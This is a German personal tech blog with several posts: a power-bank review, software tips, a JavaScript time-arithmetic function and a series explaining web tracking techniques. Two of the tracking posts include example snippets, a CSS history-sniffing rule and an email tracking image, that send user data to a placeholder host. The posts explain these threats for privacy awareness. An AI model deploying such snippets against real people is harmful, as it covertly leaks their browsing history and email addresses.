[Technik-Check] Anker (Astro3E) Externe Batterie für Handys, etc.

Vor ein paar Wochen durfte ich seit Langem mal wieder ein Wochenende mit Zelten verbringen. Bereits bei der Planung durfte ich feststellen, dass es vor Ort keinen Stromanschluss gibt über den ich mein Smartphone laden könnte und so ganz unerreichbar kann/will man ja dann auch nicht unbedingt sein.

Also fasste ich nach einer kurzen Recherche den Schluss, dass ein mobiles Ladegerät angeschafft werden muss. Es gibt auf dem Markt zwar eine Auswahl an Solar-Ladegeräten, allerdings sind diese alle relativ teuer (100+ Euro), da ich nicht regelmäßig Outdoor unterwegs bin, wurde es dann also eine mobile Batterie.

Über Amazon fand ich dann die External Battery von ANKER (siehe hier). Anbei kurz die technischen Daten:
Kapazität: 10.000 mAh
Input: DC 5V/1.5A via MicroUSB (kann also einfach mit dem Handy-Ladegerät geladen werden)
Output: DC 5V/3A via 2 USB an der Unterseite

– Ladbare Geräte: Smarthpones, Kameras, PSP, MP3/MP4 Player, GPS/Bluetooth Geräte (eigentlich alles, was mit 5V geladen wird und mit max. 3A auskommt)
– Möglichkeit 2 Geräte gleichzeitig zu laden

Das Gerät an sich erinnert wenn man es auspackt erstmal an ein zu groß geratenes Smartphone, was sich allerdings während dem Laden als Vorteil herausstellt, weil man sehr schön sein Smartphone auf der Batterie parken kann, bzw. diese locker herumtragen kann.
Das Gerät hat auf der Vorderseite einen Knopf, über den der Ladevorgang gestartet werden kann. Sobald das Handy vollständig geladen worden ist, aktiviert die mobile Batterie den Ladevorgang automatisch, so dass nicht unnötig Ladung verbraucht wird. Das Laden hat bei mehreren Android Smartphones (HTC und Samsung) und bei einem iPhone während dem Trip problemlos funktioniert. Die verbleibende Ladung der Batterie bekommt man auch nach einem Klick auf den Knopf über 4 blau leuchtende LEDs angezeigt, was äußerst praktisch ist. Die angegebene Leistung der Batterie entspricht auch den Erfahrungswerten, d.h. bei 10.000 mAh sollte man ein normales Smartphone ca. 7 Mal laden können, was auch im Praxistest der Fall war.

Insgesamt lässt sich sagen, dass die externe Batterie ein sehr gute Wahl war und sie sicher noch öfter zum Einsatz kommen wird. Wer also mal fernab von Steckdosen und Co. unterwegs ist, der kann mit dieser Batterie nichts falsch machen!

Veröffentlicht unter Allgemein | Hinterlasse einen Kommentar

Software-Aktualität dank Secunia PSI

Vor einiger Zeit habe ich von Secunia PSI gehört und es mir danach das System etwas genauer angesehen.

Der Secunia Personal Software Inspector (PSI) ist ein Vulnerability Analyzer der Firma Secunia. Konkret bedeutet dies, dass die Software den Rechner, auf welchem sie ausgeführt wird, auf Schwachstellen (in Form von veralteter Software) überprüft und anhand der Menge und der Gefahr, der entdeckten veralteten Software einen Score für den Rechner ermittelt, der zwischen 0 und 100% liegen kann. Je höher dieser Score, umso sicherer ist das System.

Eine Besonderheit bei dem PSI besteht außerdem darin, dass man nicht nur die veraltete Software angezeigt bekommt, sondern diese auch aus PSI heraus aktualisieren kann. Dies geschieht entweder vollkommen automatisch oder es öffnet sich ein Browser-Fenster, in welchem man die aktuelle Software herunterladen und anschließend installieren kann. Hierdurch entfällt das lästige regelmäßige (oder auch unregelmäßige ;-) ) Prüfen auf neue Software Aktualisierungen, denn das Programm übernimmt dies sehr komfortabel.

Ein kleines Manko hat PSI allerdings doch, denn es  greift beim Scannen nicht auf die Registry des Systems zurück, sondern scannt die Festplatten des Systems auf bekannte Anwendungen. Dies kann zu zwei Problemen führen:
1. Software, die nicht in der Datenbasis von Secuni PSI enthalten ist, wird nicht berücksichtigt, da sie nicht erkannt wird.
2. Sollten sich auf den gescannten Laufwerken Backups befinden oder Programme von einem Gast-Betriebssystem, so werden diese ebenfalls erkannt und aktualisiert, was eventuell zu Problemen führen kann.

Alles in allem lässt sich allerdings sagen, dass es sich um ein relativ nützliches Tool handelt, mit dem sich sowohl im Privathaushalt, als auch im Unternehmen die Sicherheit steigern lässt.

Veröffentlicht unter Allgemein, IT-Sicherheit | Hinterlasse einen Kommentar

[Sleuthkit Development] Weitere Artikel

Weitere Artikel zum Thema Sleuthkit findet ihr in der englischen Version dieses Blogs.

Zur englischen Version ->

Veröffentlicht unter Sleuthkit | Hinterlasse einen Kommentar

[Sleuthkit Development] Der Anfang (oder wie kompiliere ich überhaupt den normalen Source?)

Da ich aktuell am entwickeln einer Erweiterung um das XFS-Dateisystem für das Sleuthkit arbeite, wird es hier in der kommenden Zeit ein paar Berichte dazu geben. Trotz eines Wikis und einigen Artikeln ist das Sleuthkit (TSK) leider für neue Entwickler nicht ganz so einfach zu durchschauen.

Als erstes sollte man sich daher den aktuellen Source-Code aus dem offiziellen GIT Repository besorgen (URL gibt es auf der Sleuthkit Homepage).

Nach dem Klonen stellt sich für nicht so Linux-affine Entwickler direkt die Frage: Wie kompiliere ich den Code überhaupt. Dafür sind nur die folgenden 5 Befehle erforderlich:

Vorher sollte man in das Verzeichnis wechseln, in dem der Code liegt.

  1. autoreconf -fiv
  2. ./configure –prefix=/usr
  3. make
  4. sudo make install
  5. sudo ldconfig

Informationen zur eigentlichen Entwicklung folgen demnächst.

Veröffentlicht unter Sleuthkit | Hinterlasse einen Kommentar

Tracking durch Safe-Browsing in Firefox

In den letzten Tagen durfte ich mal wieder von einer weiteren bedenklichen Web-Technologie erfahren. Vermutlich kennen die meisten Personen den SmartScreen-Filter vom InternetExplorer der Firma Microsoft.
Diese Filtertechnologie schützt den Nutzer vor bekannten Malware Seiten, indem vo dem Aufruf der Seite der Browser einen Abgleich mit einer Online-Datenbank des Herstellers durchführt. Was bei diesem Prozess direkt auffällt ist, dass der Hersteller der Filter-Technologie quasi jeden Seitenaufruf des Nutzers mitbekommt und dadurch natürlich ein sehr effektives Tracking durchführen kann.
Während beim InternetExplorer explizit bei der ersten Nutzung über das Feature informiert wird und man es daktivieren kann, ist dies bei FireFox und Chrome nicht der so einfach. Diese beiden Browser nutzen eine ähnliche Technologie, SafeBrowsing von Google. In diesem Fall wird jeder Seitenaufruf mit einer von Google betriebenen Datenbank abgeglichen.

Um die Funktion im Firefox zu deaktivieren, muss man direkt in der Konfigurationsdatenbank Änderungen durchführen:
Hierfür in der Browserleiste about:config aufrufen und dann in der Liste nach dem Punkt “browser.safebrowsing.enabled” suchen und den Wert auf “false” setzen.

Veröffentlicht unter Internet, IT-Sicherheit, Privacy | Hinterlasse einen Kommentar

Tracking Techniken – Client-side CSS History mining

Durch Client-side CSS History mining ist es einem Server möglich festzustellen, ob ein Nutzer auf einer bestimmten Seite gewesen ist bzw. Ob er alle Seiten aus einer definierten Liste besucht hat.

Das Konzept des Angriffs basiert auf dem CSS-Attribut visited, welches vom Browser genutzt wird um dem Nutzer anzuzeigen, dass er auf dieser Seite bereits war. Der Abgleich der Seiten erfolgt im Browser anhand der History. Wenn darin eine Seite enthalten ist, so wird diesem Link visited zugeordnet und der Browser würde den entsprechenden Code, der zu diesem Attribut in der CSS-Datei gespeichert ist ausführen, um z.B. Die Farbe des Links zu ändern oder ein Hintergrundbild für den Link zu laden.

Der Angriff auf den Nutzer erfordert keine zusätzliche Software auf Client-Seite, da er nur auf CSS und dem Link-Attribut visited. Der Angriff wird nun anhand eines Codefragments kurz erklärt:

<style type=”text/css”>
#someclass:visited{
 background: url('http://www.server.com/logpage.php? userid=XX&class=some');
}
…
</style>
…
<a href=”http://www.mal.com” id=”some”></a>
<a href=”http://www.spy.com” id=”some”></a>

Wenn der Nutzer nun auf einer der beiden Seiten war, so würde der Browser den Link als bereits besucht markieren. Dafür würde der im CSS-Code definierte Background geladen werden, was dazu führt, dass der Browser dem dort angegebenen Skript in der URL diese Daten übermittelt.

Diese Technik könnte z.b. Dafür genutzt werden um vor dem Login bei einem Banking Portal festzustellen, ob der Nutzer auf auf einer bekannten Malware Seite war und evtl. Einen infizierten Rechner hat. Danach könnte der Server den Nutzer automatisch vor der Infektion warnen und die Übertragung von sensiblen Daten an den Malware-Server verhindern. Dieses Feature stellt jedoch auch ein gravierendes Leck der Privatsphäre dar, da es nicht aktiviert werden muss, da es auch dafür genutzt werden kann, festzustellen, ob ein Nutzer an Aktienkursen interessiert ist oder ob er eher an Schokolade interessiert ist. Anhand dieser Daten kann dann wieder gezielt geworben werden.

Dieser Angriff ähnelt von seiner Funktion her den Webtiming-Attacks und ist wie dieser ebenfalls als gefährlich einzustufen, da über die History des Browser viele Informationen über den Nutzer preisgegeben werden können.

Veröffentlicht unter Internet, IT-Sicherheit, Privacy | Hinterlasse einen Kommentar

Magento I-Banner an beliebiger Stelle als Block platzieren

Für das Magento eCommerce System gibt es eine relativ gute kostenlose Banner-Rotations Extension, den I-Banner (http://www.magentocommerce.com/magento-connect/i-banner-banner-slider-free.html).

Die Installation, sowie Konfiguration von diesem ist ziemlich simpel. Man legt nach der Installation einfach einen neuen I-Banner an, gibt diesem einen Titel, legt fest auf welchen Seiten der Banner erscheinen soll und weist diesem dann ein paar Bilder und zugehörige Links zu. Abschließend kann man dann noch zwischen zwei Platzierungen wählen, nämlich “Content Top” und “Content Bottom”, also über oder unter dem Inhalt einer CMS Seite platziert. Und fertig ist der Banner.

So schön so gut, was ist aber, wenn einem diese zwei Positionen nicht reichen und man den Banner zum Beispiel mitten zwischen dem Inhalt einer CMS Seite haben will?
Dieser Fall ist anscheinend offiziell mit der kostenlosen Version nicht vorgesehen, aber man kann dies durch einen kleinen Trick trotzdem erreichen.

Zuerst einmal kann man den folgenden Code nehmen um den Banner als Block auf der CMS Seite einzubetten:

{{block type="ibanner/content_bottom" name="ibanner_content_bottom" template="my_ibanner/content/bottom.phtml"}}

Wichtiger Hinweis: Da wir hier mit dem “content_bottom” Block arbeiten, muss die Position von dem I-Banner auch auf “Content Bottom” gesetzt sein.

Hat man dies getan, so erscheint der Banner auch an der gewünschten Stelle auf der CMS Seite, allerdings hat man den Banner gleich mehrfach (bei meinem Versuch 4 Mal!) auf der Seite, was natürlich nicht sein soll.
Um dies zu beheben, öffnet man nun die Layout Datei von dem I-Banner (diese befindet sich normalerweise unter app/design/frontend/default/default/layout/my_ibanner.xml) und führt dort folgende Änderung durch:

<cms_page>
        <reference name="content">
            <block type="ibanner/content_top" name="ibanner_content_top" template="my_ibanner/content/top.phtml" before="-"/>
            <!--<block type="ibanner/content_bottom" name="ibanner_content_bottom" template="my_ibanner/content/bottom.phtml" after="-"/>-->
        </reference>
</cms_page>

Es wird also der Standard Content Block für die CMS Seiten auskommentiert. Dies führt dazu, dass die Standard-Positionierung über (in unserem Fall) “Content Bottom” nicht mehr greift, was aber nicht weiter schlimm ist, da man den Banner ja nun einfach als Block frei platzieren kann.
Wenn man sich nun die Seite ansieht, dann hat man nun seinen Banner an der gewünschten Stelle ;-)

Ich hoffe das hilft dem einen oder anderen.

Veröffentlicht unter Internet, Magento, Webentwicklung | Hinterlasse einen Kommentar

Tracking Techniken – Webtiming Attacks

Webtiming Attacks zielen darauf ab festzustellen, auf welchen Seiten der Nutzer gewesen ist und dies dann an den Seitenbetreiber zu übermitteln.

Die zwei möglichen Varianten des Angriffs basieren auf der Nutzung von Browser-Caches. Diese Elemente, die zu einer Beschleunigung des Surfens gedacht sind, können anhand von Timing Angriffen auch gegen den Nutzer eingesetzt werden. Bei einer Timing-Attacke, kann ein Seitenbetreiber anhand der Ladezeiten des Browsers überprüfen, ob der Nutzer die zu prüfende Seite schon einmal besucht hat. Für diesen Angriff ist keine zusätzlich installierte Client-Software nötig.

In dem Browser-Web-Cache werden Bilder und andere Webelemente für einen schnelleren Zugriff lokal gespeichert. War der User nun schon mal auf der Seite, so kann dies anhand der Ladezeit festgestellt werden. Sollte der normale Browser-Cache deaktiviert sein, so besteht noch immer die Möglichkeit einer Überprüfung anhand des DNS-Caches des Browsers. Durch einen Web-Cache-Angriff lässt sich mit einer Genauigkeit von 97% sagen, dass der Nutzer dies Seite besucht hatte. Bei der DNS-Cache Variante liegt die Genauigkeit bei 55% und besser, je nachdem, wie hoch die Fehlerstrafe des Caches ist.

Webtiming-Angriffe sind als verhältnismäßig gefährlich einzustufen, da diese Angriffe komplett ohne Kenntnis des Nutzers stattfinden. Da der User sich gegen diesen Angriff nicht aktiv wehren kann, gilt er als besonders gravierend. Es muss keine zusätzliche Software installiert werden und ein Angreifer kann auf beliebige Domains prüfen. So könnte z.B. eine Versicherung, welche eine Online-Anmeldung bereitstellt bei der Anmeldung eines potenziellen Kunden noch dessen Browser-Cache auf das Vorkommen von Besuchen auf Informationsseiten über schwere Krankheiten prüfen und dies mitsamt seiner Anmeldung übermitteln. Da dieser Angriff gravierende Auswirkungen haben kann, ist sein Gefahrenpotential als hoch einzustufen.

Auf die genaue Ausführung des Angriffs wird eventuell zu einem späteren Zeitpunkt eingegangen, da dies relativ umfangreich ist. Fürs Erste sei auf die vorhandenen Research Papers von Felten und Schneider verwiesen (z.B.: Timing Attacks on Web Privacy – Edward W. Felten and Michael A. Schneider – 2000 -ACM).

Veröffentlicht unter Internet, IT-Sicherheit, Privacy | Hinterlasse einen Kommentar

Tracking Techniken – HTML-Mails

HTML-Mails sind heutzutage weit verbreitet und werden zum eleganten gestalten von Newslettern und Mails genutzt. Warum fallen diese nun unter die Serie “Tracking Techniken”? Und warum werden HTML-Mails auch von einigen Mailprogrammen erst nach einer Bestätigung durch den Nutzer angezeigt?

Die Antwort ist relativ simpel: HTML-Mails ermöglichen es einem Angreifer über das Senden einer Mail die Existenz einer Mailadresse zu prüfen. Die meisten aktuellen Mail-Clients ermöglichen es dem Nutzer HTML-Mails anzuzeigen und laden teilweise auch ohne Nachfrage beim Nutzer die in dem HTML-Code eingebundenen Grafiken.

Ein Spam-Versender könnte dadurch unter anderem die Existenz von Mailadressen testen, an die er willkürlich seinen Spam gesendet hat. Er müsste dafür lediglich als Quelle eines Bildes ein PHP-Skript angeben, über das das Bild bezogen werden soll und diesem beim Versand noch eine ID oder einfach die Mailadresse in die URL geben. Wenn nun die Mail geöffnet und die Bilder geladen werden, wird automatisch eine Benachrichtigung an den Server des Angreifers erzeugt.

Der Code in der Mail könnte wie folgt aussehen:

<img src=“http://attacker.com/picture.php?mail@mail.de“>

Durch HTML-Mails wird die Privatsphäre eines Nutzer auch in der Welt des Mailverkehrs beeinträchtigt. Durch eingebettete externe Bilder in einer Mail lässt sich unter anderem direkt beim Laden feststellen, ob die Mailadresse existiert, was u.a. Spam-Versendern ein gezielteres Versenden ermöglicht. Daher sollte man sich überlegen, ob man HTML-Mails von unbekannten bzw. unseriösen Absendern einfach so öffnet.

Veröffentlicht unter Internet, IT-Sicherheit, Privacy | Hinterlasse einen Kommentar

Addieren und Subtrahieren von Minuten auf eine Uhrzeit (JavaScript)

Ich hatte zuletzt im Rahmen eines Projektes mehrfach eine gewisse Zahl an Minuten von einer gegebenen Uhrzeit abzuziehen. Da ich nach einer kurzen Suche keine schnelle Lösung in JavaScript für die Berechnung von Uhrzeiten des Formats (HH:MM) finden konnte habe ich eine kleine Methode zur Berechnung geschrieben. Vielleicht kann der eine oder andere diese ebenfalls gebrauchen.

// Methode zum addieren/subtrahieren einer Menge an Minuten auf eine Uhrzeit
// time = Uhrzeit im Format HH:MM
// offset = Zeit in Minuten
function addMinutes(time, offset){
	// Uhrzeit wird in Stunden und Minuten geteilt
	var elements = time.split(":");
	var hours = elements[0];	
	var minutes = elements[1];
	// Aufrunden des Offsets fuer den Fall, dass eine Fliesskommazahl uebergeben wird
	var roundOffset = Math.ceil(offset);
	
	// Umrechnen der Uhrzeit in Minuten seit Tagesbeginn
	var timeSince24 = (hours * 60) + parseInt(minutes);
	// Addieren des uebergebenen Offsets
        timeSince24 = timeSince24 + parseInt(roundOffset);

	// Ueberlaufbehandlung
	if(timeSince24 < 0)
		timeSince24 = timeSince24 + 1440;
	else if(timeSince24 > 1440)
		timeSince24 = timeSince24 - 1440;
	
	// Errechnen von Stunden und Minuten aus dem Gesamtzeit seit Tagesbeginn
	var resMinutes = timeSince24 % 60;
	var resHours = (timeSince24 - resMinutes)/60;
	
	// Sicherstellen, dass der Wert fuer Minuten immer zweistellig ist
	if(resMinutes < 10)
		resMinutes = "0" + resMinutes;
		
	// Ausgabe des formatierten Ergebnisses
	return resHours + ":" + resMinutes;
}

Kommentare zu eventuell sinnvolleren Lösungen sind auf jeden Fall erwünscht ;-)

Veröffentlicht unter Internet, JavaScript, Programmierung, Webentwicklung | Hinterlasse einen Kommentar